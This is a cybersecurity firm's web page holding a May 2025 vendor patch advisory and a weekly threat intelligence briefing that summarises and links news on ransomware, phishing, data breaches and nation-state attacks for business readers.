· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 15 May 2025 – Microsoft, Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom Security Updates
Executive Summary
Microsoft's Patch Tuesday for May 2025 addressed 72 vulnerabilities across its product line, including five actively exploited zero-day vulnerabilities. Notably, critical remote code execution flaws were patched in Microsoft Office, Azure DevOps Server, and the Windows Common Log File System Driver.
Adobe released security updates to address 40 vulnerabilities across several products, including critical issues in Adobe Photoshop, Illustrator, and Bridge. These flaws could lead to arbitrary code execution if exploited.
*Updated to clarify that the two vulnerabilities, CVE-2025-4427 and CVE-2025-4428, relating to Ivanti Endpoint Manager Mobile (EPMM) are associated with open-source libraries utilised by EPMM.
Ivanti disclosed multiple vulnerabilities affecting several of its products, including a critical authentication bypass in Ivanti Neurons for ITSM (on-premises). A remote code execution vulnerability and an authentication bypass vulnerability, both relating to two open-source libraries integrated into Ivanti Endpoint Manager Mobile (EPMM), were also disclosed. Ivanti has reported that the EPMM-related vulnerabilities have been exploited in the wild, emphasising the importance of applying the latest patches that address these vulnerabilities to secure affected systems.
Fortinet addressed several vulnerabilities across its product suite, notably patching a zero-day remote code execution flaw (CVE-2025-32756) in FortiVoice systems that was actively exploited. Additional critical updates were released for FortiOS and FortiProxy. Administrators should prioritise these updates to protect against potential exploits.
ASUS issued patches for two critical vulnerabilities (CVE-2025-3462 and CVE-2025-3463) in its DriverHub utility. These flaws could allow attackers to execute arbitrary code via crafted HTTP requests or malicious .ini files. Users of ASUS DriverHub should update to the latest version to mitigate these risks.
Apple released comprehensive security updates across its platforms, addressing several vulnerabilities in iOS, iPadOS, macOS, watchOS, tvOS, and visionOS.
Broadcom released a security update for VMware Tools, addressing an insecure file handling vulnerability (CVE-2025-22247). This flaw could allow a malicious actor with non-administrative privileges on a Windows or Linux guest VM to tamper with local files, potentially leading to unauthorised behaviours within the virtual environment.
Juniper announced fixes for nearly 90 bugs in third-party dependencies in Secure Analytics, the virtual appliance that collects security events from network devices, endpoints, and applications.
Zoom released seven advisories for nine security defects in Zoom Workplace Apps across desktop and mobile platforms. The most severe of the issues is CVE-2025-30663 (CVSS 8.8), a high-severity time-of-check time-of-use race condition that could allow a local, authenticated attacker to elevate their privileges.
What’s the risk to me or my business?
The actively exploited vulnerabilities across these platforms could allow attackers to compromise the confidentiality, integrity, and availability of affected systems and data. Unpatched systems are at heightened risk of exploitation, leading to potential data breaches, system disruptions, and unauthorised access.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on the specific updates within this Microsoft Patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2025-May
Adobe, Ivanti, Fortinet, ASUS, Apple, Broadcom, Juniper and Zoom
Further details of the vulnerabilities in the affected vendors' products can be found here:
https://helpx.adobe.com/security/security-bulletin.html
https://fortiguard.fortinet.com/psirt
https://www.asus.com/content/asus-product-security-advisory/
https://support.apple.com/en-us/100100
https://www.zoom.com/en/trust/security-bulletin/
Black Arrow Cyber Threat Intelligence Briefing 09 May 2025:
-Email-Based Attacks Top Cyber Insurance Claims
-Hackers Pose as Staff in UK Retail Cyber Strikes
-High Profile UK Cyber Attacks Underscore the Case for Resilience over Reactivity
-Cyber Attacks Are Costing UK Firms Billions Every Year: Ransom Payments, Staff Overtime, and Lost Business Are Crippling Victims
-Don’t Plug Phones into Chinese Electric Cars, Defence Firms Warn
-94% of Leaked Passwords Are Not Unique
-Personal Data of Top Executives Easily Found Online
-The SMB Cyber Security Gap: High Awareness, Low Readiness
-How Cyber Criminals Exploit Psychological Triggers in Social Engineering Attacks
-Darcula Phishing as a Service Operation Snares 800,000+ Victims
-Cyber Criminals Hold Britain’s Boardrooms to Ransom
-UK at Risk of Russian Cyber and Physical Attacks as Ukraine Seeks Peace Deal
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of threat intelligence this week reports that business email compromise and funds transfer fraud now account for 60% of cyber insurance claims, and that social engineering now accounts for the majority of cyber threats faced by individuals. Attackers continue to exploit human factors, for example posing as staff to manipulate help desks to grant access to systems as seen in the recent wave of cyber attacks in the UK retail sector. These incidents reinforce the critical importance of layered identity verification, rigorous staff awareness and crisis planning across all sectors.
The growing scale and cost of cyber attacks, now exceeding £64 billion annually for UK firms, highlights a pressing need for resilience over reactivity as a high percentage of affected companies enter insolvency proceedings or file for bankruptcy. Ransomware, social engineering, and password reuse result in operational and reputational harm. Organisations need dedicated cyber leadership, and to avoid a compliance-led approach. Proactive governance and stronger board accountability must become standard practice.
From boardroom data exposure to state-sponsored espionage risks linked to Chinese electric vehicles, the threat landscape is increasingly complex. We continue to warn that both SMEs and large enterprises face escalating risks from persistent attackers, many leveraging phishing-as-a-service platforms or exploiting geopolitical tensions. Now more than ever, cyber security must be embedded in leadership thinking, supply chain oversight, and incident readiness.
Top Cyber Stories of the Last Week
Email-Based Attacks Top Cyber Insurance Claims
Coalition’s 2025 Cyber Claims Report found that business email compromise and funds transfer fraud (FTF) made up 60% of all claims in 2024, with BEC incidents alone averaging $35,000 per event. While ransomware losses were far higher at $292,000 on average, their severity dropped by 7%. Email-based attacks remain the most persistent risk, with nearly a third of BEC incidents also leading to FTF.
Hackers Pose as Staff in UK Retail Cyber Strikes
The UK’s National Cyber Security Centre (NCSC) has issued a critical alert following a wave of cyber attacks targeting major retailers, including M&S, Co-op and Harrods. Criminals posed as IT staff or locked-out employees to manipulate help desk staff into resetting passwords, allowing unauthorised access to internal systems. The attackers, identifying as “DragonForce”, claimed responsibility for data breaches and appear to use methods similar to those of other financially motivated threat groups. The NCSC is urging firms to tighten authentication for help desk processes, particularly for senior staff, and to adopt multi-factor checks and identity code words.
High Profile UK Cyber Attacks Underscore the Case for Resilience over Reactivity
The series of recent cyber attacks on major UK retailers highlights the growing complexity and impact of digital threats. Disruption has ranged from payment failures and warehouse shutdowns to reputational damage, underscoring that cyber resilience is now critical to business continuity. Experts stress that traditional, compliance-led approaches are no longer enough; organisations must adopt Zero Trust principles, enforce multi-factor authentication, and monitor third-party access. With techniques such as credential theft and ransomware increasingly used, cyber security must be treated as a board-level issue embedded in governance, operations and crisis planning.
Cyber Attacks Are Costing UK Firms Billions Every Year: Ransom Payments, Staff Overtime, and Lost Business Are Crippling Victims
Cyber attacks are costing UK businesses £64 billion annually, with over half suffering at least one attack in the past year. Phishing, malware, and online banking threats were the most common, and nearly two-thirds cited staff overtime as a major cost. Direct losses totalled £37 billion, with indirect impacts like increased cyber security budgets and lost clients adding over £26 billion more. Alarmingly, 1 in 8 affected firms entered administration. Despite this, 15% of businesses have no cyber security budget, and nearly half manage risks entirely in-house, underscoring the urgent need for proactive investment in cyber resilience.
Don’t Plug Phones into Chinese Electric Cars, Defence Firms Warn
Defence and intelligence firms are warning staff not to connect phones via cable or Bluetooth to Chinese-made electric vehicles due to fears of state-sponsored espionage. The UK Ministry of Defence has already restricted EV access on military sites, citing findings from the Defence Science and Technology Laboratory that EVs may pose national security risks. Defence suppliers including BAE Systems and Rolls-Royce are advising precautions as all connected vehicles potentially expose sensitive data to foreign interception.
94% of Leaked Passwords Are Not Unique
A new study of over 19 billion leaked passwords has found that 94% are reused or duplicated, leaving users highly vulnerable to cyber attacks. Common entries like “123456”, “admin”, and “password” remain prevalent, with over 700 million instances of “1234” alone. Many systems still rely on default credentials, which users often fail to change. Only 6% of passwords were found to be unique and relatively secure. The report highlights the urgent need for organisations to enforce strong password policies, promote the use of password managers and multi-factor authentication, and regularly monitor for credential leaks.
Personal Data of Top Executives Easily Found Online
Incogni has found that over 75% of corporate board members have personal information including home addresses and family links readily available on people search websites. Exposure is highest in consumer staples (84%), industrials (81%), and technology (77%) sectors, with 26% of board members appearing on more than 20 such sites. Notably, exposure is unrelated to company size, affecting firms with revenues both above $50 billion and below $10 billion equally. The report warns that any organisation, regardless of profile, could face reputational or security risks if senior leaders’ private data remains unprotected online.
The SMB Cyber Security Gap: High Awareness, Low Readiness
CrowdStrike’s latest survey reveals that while 90% of small and midsize business (SMB) leaders recognise cyber threats as a business risk, only 42% provide regular cyber security training. Cost remains the top barrier to better protection, with two-thirds citing it as their primary challenge, yet cutting corners often results in ineffective defences. Smaller firms are disproportionately vulnerable, with 75% of micro-businesses admitting a ransomware attack could shut them down. The report urges stronger vendor support and practical guidance to help SMBs close this growing readiness gap.
How Cyber Criminals Exploit Psychological Triggers in Social Engineering Attacks
Avast reports that social engineering now accounts for the majority of cyber threats faced by individuals in 2024. These attacks exploit human psychology using authority, urgency, and familiarity to bypass technical controls, with tactics ranging from phishing and fake system prompts to deepfake video calls. One such attack resulted in the theft of over $25 million from a global firm. Even security experts are being caught out, highlighting the sophistication of these scams. The report underscores the need for strong identity verification, multi-factor authentication, and regular staff training to mitigate the growing risks posed by these increasingly deceptive methods.
Darcula Phishing as a Service Operation Snares 800,000+ Victims
A sophisticated phishing-as-a-service operation known as Darcula has enabled cyber criminals to compromise over 880,000 payment cards in just seven months. Targeting mobile users globally through SMS, RCS and iMessage, the operation impersonates trusted brands to deceive victims into submitting sensitive information. Researchers uncovered a toolkit named “Magic Cat” at the core of the operation, designed to support non-technical actors with ready-made templates and real-time data streaming. With an estimated 600 cyber crime groups using the platform, law enforcement agencies across multiple jurisdictions have been alerted to the growing threat.
Cyber Criminals Hold Britain’s Boardrooms to Ransom
Cyber attacks have impacted over half of UK firms, with ransomware the most damaging threat. High-profile breaches, such as the one affecting M&S, highlight how attacks can cripple operations for weeks and damage share value: M&S alone saw a billion wiped from its market cap. Experts warn that hybrid working, third-party suppliers, and boardroom inexperience are compounding risks, as only 26% of company boards now include a director with cyber responsibility. Despite rising adoption of cyber insurance, it is no substitute for robust cyber security controls.
UK at Risk of Russian Cyber and Physical Attacks as Ukraine Seeks Peace Deal
The UK faces an increasing threat from Russian cyber and physical sabotage as Ukraine moves closer to a peace deal, according to the head of the National Cyber Security Centre. Over 200 cyber incidents have been managed since September 2024, with twice as many nationally significant cases compared to the previous year. Russian intelligence is reportedly using criminal proxies to carry out sabotage, while Iranian, North Korean, and Chinese actors also pose growing risks. The UK government warns that hostile states are using cyber attacks to pursue strategic objectives, often operating in the “grey zone” with plausible deniability.
Sources:
https://www.darkreading.com/cyber-risk/email-based-attacks-cyber-insurance-claims
https://www.scworld.com/brief/hackers-pose-as-it-staff-in-uk-retail-cyber-strikes
https://www.itpro.com/security/cyber-attacks/cyber-attacks-cost-uk-firms-64-billion-each-year
https://www.helpnetsecurity.com/2025/05/07/corporate-directors-personal-information-online/
https://www.msspalert.com/news/the-smb-cybersecurity-gap-high-awareness-low-readiness
https://www.helpnetsecurity.com/2025/05/06/social-engineering-human-behavior/
https://www.infosecurity-magazine.com/news/darcula-phishing-as-a-service/
Governance, Risk and Compliance
UK firms have ‘alarming gaps’ in cyber security readiness | The Standard
UK retail cyber-attacks underscore the case for resilience over reactivity
UK given cyber wake-up call as government looks to act
Government to unveil new cyber security measures after wave of attacks | The Standard
Are You Too Reliant on Third-Party Vendors for Cyber Security? - Security Boulevard
Personal data of top executives easily found online - Help Net Security
The SMB Cyber Security Gap: High Awareness, Low Readiness | MSSP Alert
Building a resilient mindset | The Independent
Cyber resilience is the strategy: Why business and security must align now | SC Media
How CISOs can talk cyber security so it makes sense to executives - Help Net Security
CIOs pay too much for not enough IT security | CIO Dive
CISO vs CFO: why are the conversations difficult? | CSO Online
CISOs Transform Into Business-Critical Digital Risk Leaders
Global cyber security readiness remains critically low - Help Net Security
81% of High-Uncertainty Middle-Market Firms Delay Tech Initiatives
Threats
Ransomware, Extortion and Destructive Attacks
UK businesses lost £64bn to cyber-attacks over a three-year period - UKTN
Don't pay hackers: Cyber Security chief's warning after major retail attacks | ITV News
Cyber Attacks on Critical Infrastructures Makes Us Very Vulnerable - Security Boulevard
Why Ransomware Isn’t Just a Technology Problem (It’s Worse) - Security Boulevard
Ransomware spike exposes cracks in cloud security - Help Net Security
Have Cyber Insurance? The Preferred Victims Of Ransomware Attackers - Above the Law
New "Bring Your Own Installer" EDR bypass used in ransomware attack
Play ransomware exploited Windows logging flaw in zero-day attacks
Govt to inject £16m into retail cyber security
LockBit ransomware gang hacked, victim negotiations exposed
Qilin Has Emerged as The Top Ransomware Group in April with 74 Cyber Attacks
Ransomware Attackers Leveraged Privilege Escalation Zero-day | Symantec Enterprise Blogs
Coalition 2025 Cyber Claims Report Finds Ransomware Stabilized but Remains Costly for Businesses
Ukrainian Nefilim Ransomware Affiliate Extradited to US - SecurityWeek
US Charges Yemeni Hacker Behind Black Kingdom Ransomware Targeting 1,500 Systems
Kickidler employee monitoring software abused in ransomware attacks
470 Ransomware Attacking in 2025, Qilin Remains Dominant Followed by Silent & Crypto24
Ransomware Victims
Despite Arrests, Scattered Spider Continues Hacking
Britain to warn companies cyber security must be 'absolute priority' - The Economic Times
Cyber criminals hold Britain's boardrooms to ransom | This is Money
M&S hackers tricked IT help desk workers to access company systems, says report | The Independent
Inside DragonForce, the Group Tied to M&S, Co-op and Harrods Hacks - Infosecurity Magazine
Co-op cyber attack: supermarket cuts off store deliveries amid food shortage fears
UK retailers under attack: why hackers hit household names
Why Are So Many UK Supermarkets Getting Hacked? | HuffPost UK Life
IT warning after hackers close 160-year-old firm in Kettering - BBC News
Banking Customer Data Exposed Following Ransomware Attack on Vendor | MSSP Alert
Co-op left with empty shelves as it battles cyber attack
Marks & Spencer losses hit £1bn in wake of devastating cyber attacks | This is Money
Rhysida Ransomware gang claims the hack of the Government of Peru
West Lothian schools hit by ransomware cyber attack - BBC News
Lessons Learned from the Blackbaud Hack and Legal Fallout
German drinks group Oettinger confirms cyber attack - Just Drinks
After Hacking 60M Kids for Ransom, PowerSchool Attackers Extort Teachers
TDSB says it got ransom demand over stolen student data not destroyed in cyber security incident
Masimo Manufacturing Facilities Hit by Cyber Attack - SecurityWeek
Phishing & Email Based Attacks
Gen AI is great at phishing, pig butchering scams • The Register
'Venom Spider' Targets Hiring Managers in Phishing Scheme
Beyond the hook: How phishing is evolving in the world of AI | Computer Weekly
Darcula Phishing as a Service Operation Snares 800,000+ Victims - Infosecurity Magazine
Microsoft enforces strict rules for bulk emails on Outlook - gHacks Tech News
Ransomware costs ease but email-based attacks dominate, Coalition reports - Reinsurance News
'CoGUI' Phishing Kit Helps Chinese Hackers Target Japan
Sophisticated Phishing Attack Abuses Discord & Attacked 30,000 Users
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Majority of cyber insurance ransomware claims are due to BEC
Email-Based Attacks Top Cyber Insurance Claims
Other Social Engineering
How cyber criminals exploit psychological triggers in social engineering attacks - Help Net Security
Hackers pose as IT staff in UK retail cyber strikes | SC Media
Marks & Spencer losses hit £1bn in wake of devastating cyber attacks | This is Money
Cyber attack on M&S should be 'wake-up call', minister warns | Politics News | Sky News
Personal data of top executives easily found online - Help Net Security
Darcula PhaaS steals 884,000 credit cards via phishing texts
North Korean hackers show telltale signs, researchers say | SC Media
The many variants of the ClickFix social engineering tactic - Help Net Security
Wave of tech layoffs leads to more job scams - Help Net Security
How to spot and expose fraudulent North Korean IT workers | TechTarget
Crypto scammers abuse X ads with spoofed links | Cybernews
Fraud, Scams and Financial Crime
Gen AI is great at phishing, pig butchering scams • The Register
Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable - Help Net Security
Darcula PhaaS steals 884,000 credit cards via phishing texts
Wave of tech layoffs leads to more job scams - Help Net Security
Artificial Intelligence
Gen AI is great at phishing, pig butchering scams • The Register
UK Warns of AI-Based Attacks Against Critical Infrastructure
UK critical systems at risk from ‘digital divide’ created by AI threats | Computer Weekly
1 in 3 workers keep AI use a secret - Help Net Security
Beyond the hook: How phishing is evolving in the world of AI | Computer Weekly
Cisco sounds the alarm over AI security threats
Global cyber security readiness remains critically low - Help Net Security
AI vs. AI: Both Friend and Foe in Cyber Security - EE Times
Most CEOs find their C-suite lacks much-needed 'AI-savvy' | ZDNET
2FA/MFA
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Malware
Hackers Using Weaponized PDF To Deliver Remcos RAT Malware on Windows
StealC malware enhanced with stealth upgrades and data theft tools
Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data
Experts shared up-to-date C2 domains and other artifacts related to recent MintsLoader attacks
Researchers Uncover Malware in Fake Discord PyPI Package Downloaded 11,500+ Times
Linux wiper malware hidden in malicious Go modules on GitHub
Activated Magento Backdoor Hits Up to 1,000 Online Stores
Google identifies new malware linked to Russia-based hacking group | Reuters
Macs under threat from thousands of hacked sites spreading malware — how to stay safe | Tom's Guide
The many variants of the ClickFix social engineering tactic - Help Net Security
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
Supply chain attack hits npm package with 45,000 weekly downloads
Crypto scammers abuse X ads with spoofed links | Cybernews
Your USB Cable Or Device Could Be Hiding Malicious Hardware: Here's How To Stay Safe
Disney Slack hacker was Californian, not Russian: DoJ • The Register
Bots/Botnets
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet
Improperly Patched Samsung MagicINFO Vulnerability Exploited by Botnet - SecurityWeek
Mobile
Apple issues mercenary spyware threat notifications | Security Magazine
Why Android users should care more about monthly security updates
Update ASAP: Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers
Google fixes actively exploited FreeType flaw on Android
Google Confirms Android Attack Warnings — Powered By AI
Denial of Service/DoS/DDoS
Europol Take Down DDoS-for-Hire Empire & Arrested 4 Admins
Europol Announces More DDoS Service Takedowns, Arrests - SecurityWeek
Internet of Things – IoT
Don’t plug phones into Chinese electric cars, defence firms say
Hackers Manage To Take Control of Nissan Leaf's Steering Remotely
Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet
Please stop exposing your IoT devices on the internet; your smart light might betray you
Data Breaches/Leaks
Dating app Raw exposed users' location data and personal information | TechCrunch
Signal clone used by Trump official stops operations after report it was hacked - Ars Technica
The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats | WIRED
UK Legal Aid Agency investigates cyber security incident
VC firm Insight Partners confirms personal data stolen during January hack | TechCrunch
Education giant Pearson hit by cyber attack exposing customer data
Hegseth bypassed Pentagon security with dirty line
Texas School District Notifies Over 47,000 People of Major Data Breach - Infosecurity Magazine
Organised Crime & Criminal Actors
Despite Arrests, Scattered Spider Continues Hacking
War on cyber crime: why disrupting attacker infrastructure is critical for security
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data
Crypto scammers abuse X ads with spoofed links | Cybernews
Insider Risk and Insider Threats
How cyber criminals exploit psychological triggers in social engineering attacks - Help Net Security
North Korean hackers show telltale signs, researchers say | SC Media
How to spot and expose fraudulent North Korean IT workers | TechTarget
The Most Pressing Security Threat to Business is Hidden in Plain Sight - Security Boulevard
Insurance
Email-Based Attacks Top Cyber Insurance Claims
UK Cyber Insurance Claims Second Highest on Record - Infosecurity Magazine
Have Cyber Insurance? The Preferred Victims Of Ransomware Attackers - Above the Law
A guide to cyber liability insurance for a small business
ABA & Cyber Insurance: Essential IT Requirements for Small Law Firms - LexBlog
Supply Chain and Third Parties
Magento supply chain attack compromises hundreds of e-stores
EY Survey Reveals Rising Cyber Threats from Third-Party Supply Chain Risks
Banking Customer Data Exposed Following Ransomware Attack on Vendor | MSSP Alert
Supply chain attack hits npm package with 45,000 weekly downloads
Activated Magento Backdoor Hits Up to 1,000 Online Stores
Cloud/SaaS
Ransomware spike exposes cracks in cloud security - Help Net Security
New Microsoft 365 outage impacts Teams and other services
Outages
New Microsoft 365 outage impacts Teams and other services
Encryption
After Signal controversy, do private conversations online exist anymore? | CyberScoop
WhatsApp provides no cryptographic management for group messages - Ars Technica
Just 5% of Enterprises Have Deployed Quantum-Safe Encryption - Infosecurity Magazine
Linux and Open Source
Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US | WIRED
Linux wiper malware hidden in malicious Go modules on GitHub
DoD announces overhaul of 'outdated' software procurement • The Register
Passwords, Credential Stuffing & Brute Force Attacks
A whopping 94% of leaked passwords are not unique - will you people ever learn? | ZDNET
A review of 19 billion passwords reveals people are still bad at them | Mashable
Third of Online Users Hit by Account Hacks Due to Weak Passwords - Infosecurity Magazine
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Microsoft sets all new accounts passwordless by default
If we don’t take cyber security seriously, maybe AI will | Cybernews
Social Media
Crypto scammers abuse X ads with spoofed links | Cybernews
Ireland's DPC fined TikTok €530M for sending EU user data to China
Trump promises protection for TikTok as sale deadline nears • The Register
TikTok Fined €530 Million Over Chinese Access to EU Data
Regulations, Fines and Legislation
UK firms have ‘alarming gaps’ in cyber security readiness | The Standard
UK given cyber wake-up call as government looks to act
UK Government to unveil new cyber security measures after wave of attacks | The Standard
What NY's New Security Rules Mean for Finance Firms
What a future without CVEs means for cyber defence - Help Net Security
Ireland's DPC fined TikTok €530M for sending EU user data to China
The nation’s cyber community is quietly rebelling against Trump’s changes - POLITICO
Cut CISA & Everyone Pays for It
Offensive cyber security to be emphasized by Trump admin, official says | SC Media
TikTok Fined €530 Million Over Chinese Access to EU Data
Signal app clone used by Trump's administration was hacked in less than 30 mins - SiliconANGLE
White House Proposal Slashes Half-Billion From CISA Budget - SecurityWeek
Sen. Murphy: Trump administration has ‘illegally gutted funding for cyber security’ | CyberScoop
The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats | WIRED
The Trump Administration Sure Is Having Trouble Keeping Its Comms Private | WIRED
Models, Frameworks and Standards
UK Cyber Essentials Certification Numbers Falling Short - Infosecurity Magazine
Data Protection
Ireland's DPC fined TikTok €530M for sending EU user data to China
Careers, Working in Cyber and Information Security
The 14 most valuable cyber security certifications | CSO Online
Europe leads shift from cyber security ‘headcount gap’ to skills-based hiring | Computer Weekly
Law Enforcement Action and Take Downs
Despite Arrests, Scattered Spider Continues Hacking
War on cyber crime: why disrupting attacker infrastructure is critical for security
Israel Nabs Suspect Sought by US Over $190M Nomad Bridge Exploit: Report - Decrypt
Polish authorities arrested 4 people behind DDoS-for-hire platforms
Europol Take Down DDoS-for-Hire Empire & Arrested 4 Admins
Three Brits charged over US, Canada swattings • The Register
Ukrainian Nefilim Ransomware Affiliate Extradited to US - SecurityWeek
US Charges Yemeni Hacker Behind Black Kingdom Ransomware Targeting 1,500 Systems
Disney Slack hacker was Californian, not Russian: DoJ • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Cyber Warfare's Limitations: Lessons for Future Conflicts
41 Countries Taking Part in NATO's Locked Shields 2025 Cyber Defence Exercise - SecurityWeek
Cyber Warfare Funding Accelerates and Everyone is at Risk - Security Boulevard
Nuclear warheads and cyber attacks: How UK must react to Russia threat
Could striking first in cyber be new Pentagon policy? - Defense One
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
Nation State Actors
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Hostile nation states are ramping up cyber attacks on UK, warns GCHQ | This is Money
China
Don’t plug phones into Chinese electric cars, defence firms say
White House Warns China of Cyber Retaliation Over Infrastructure Hacks - Infosecurity Magazine
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
'CoGUI' Phishing Kit Helps Chinese Hackers Target Japan
Ireland's DPC fined TikTok €530M for sending EU user data to China
TikTok Fined €530 Million Over Chinese Access to EU Data
Trump promises protection for TikTok as sale deadline nears • The Register
Russia
UK at risk of Russian cyber and physical attacks as Ukraine seeks peace deal
Nuclear warheads and cyber attacks: How UK must react to Russia threat
Google identifies new malware linked to Russia-based hacking group | Reuters
Poland says Russia is trying to interfere in presidential election | Reuters
Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US | WIRED
Pro-Russian hackers claim to have targeted several UK websites | Cybercrime | The Guardian
Convicted Russian spies attended Brexit event in Parliament - BBC News
North Korea
North Korean hackers show telltale signs, researchers say | SC Media
How to spot and expose fraudulent North Korean IT workers | TechTarget
Tools and Controls
Email-Based Attacks Top Cyber Insurance Claims
UK retail cyber-attacks underscore the case for resilience over reactivity
Building a resilient mindset | The Independent
Cyber resilience is the strategy: Why business and security must align now | SC Media
Security Tools Alone Don't Protect You — Control Effectiveness Does
Personal data of top executives easily found online - Help Net Security
Are You Too Reliant on Third-Party Vendors for Cyber Security? - Security Boulevard
41 Countries Taking Part in NATO's Locked Shields 2025 Cyber Defence Exercise - SecurityWeek
Hacker Finds New Technique to Bypass SentinelOne EDR Solution - Infosecurity Magazine
How CISOs can talk cyber security so it makes sense to executives - Help Net Security
CIOs pay too much for not enough IT security | CIO Dive
CISO vs CFO: why are the conversations difficult? | CSO Online
What it really takes to build a resilient cyber program - Help Net Security
A guide to cyber liability insurance for a small business
How OSINT supports financial crime investigations - Help Net Security
Microsoft enforces strict rules for bulk emails on Outlook - gHacks Tech News
81% of High-Uncertainty Middle-Market Firms Delay Tech Initiatives
How to use PC sandbox apps to test dubious files safely | PCWorld
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
ABA & Cyber Insurance: Essential IT Requirements for Small Law Firms - LexBlog
Reports Published in the Last Week
Other News
UK businesses lost £64bn to cyber-attacks over a three-year period - UKTN
Hostile nation states are ramping up cyber attacks on UK, warns GCHQ | This is Money
The SMB Cyber Security Gap: High Awareness, Low Readiness | MSSP Alert
"Nationally Significant" Cyber-Attacks Have Doubled, UK’s NCSC Reports - Infosecurity Magazine
UK Cyber Insurance Claims Second Highest on Record - Infosecurity Magazine
Half of Irish firms have fallen victim to cyber crime in past five years
Delta Air Lines class action cleared for takeoff • The Register
US tells CNI orgs to stop connecting OT kit to the web | Computer Weekly
US government warns of "unsophisticated" hackers targeting oil and gas systems | TechRadar
Almost half of Flemish companies suffered cyber attack last year
Cyber Attacks Targeting US Increased by 136% | Security Magazine
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
Vulnerability Management
Why Android users should care more about monthly security updates
What a future without CVEs means for cyber defence - Help Net Security
Cut CISA & Everyone Pays for It
White House Proposal Slashes Half-Billion From CISA Budget - SecurityWeek
Life Without CVEs? It's Time to Act
Vulnerabilities
Update ASAP: Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers
PoC Published for Exploited SonicWall Vulnerabilities - SecurityWeek
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
Hackers Selling SS7 0-Day Vulnerability on Hacker Forums for $5000
Second Wave of Attacks Targets SAP NetWeaver | MSSP Alert
Cisco Patches CVE-2025-20188 (10.0 CVSS) in IOS XE That Enables Root Exploits via JWT
Cisco Patches 35 Vulnerabilities Across Several Products - SecurityWeek
FBI: End-of-life routers hacked for cyber crime proxy networks
Researcher Says Fixed Commvault Bug Still Exploitable
SysAid Patches 4 Critical Flaws Enabling Pre-Auth RCE in On-Premise Version
Improperly Patched Samsung MagicINFO Vulnerability Exploited by Botnet - SecurityWeek
Apache Parquet exploit tool detect servers vulnerable to critical flaw
Microsoft Warns of Attackers Exploiting Misconfigured Apache Pinot Installations - SecurityWeek
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 02 May 2025
-M&S ‘Had No Plan’ for Cyber Attacks, with Staff Sleeping in the Office Amid ‘Paranoia’ and ‘Chaos’
-More than 60% of Organisations Are Insufficiently Prepared to Address Urgent Geopolitical, Cyber Security, and Regulatory Risks
-Fake Payments, Receipts and Invoices on the Rise
-Account Takeovers: A Growing Threat to Your Business and Customers
-North Korean Operatives Have Infiltrated Hundreds of Fortune 500 Companies
-Phone Theft Is Turning into a Serious Cyber Security Risk
-Why Cyber Resilience Must be Part of Every Organisation’s DNA
-Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
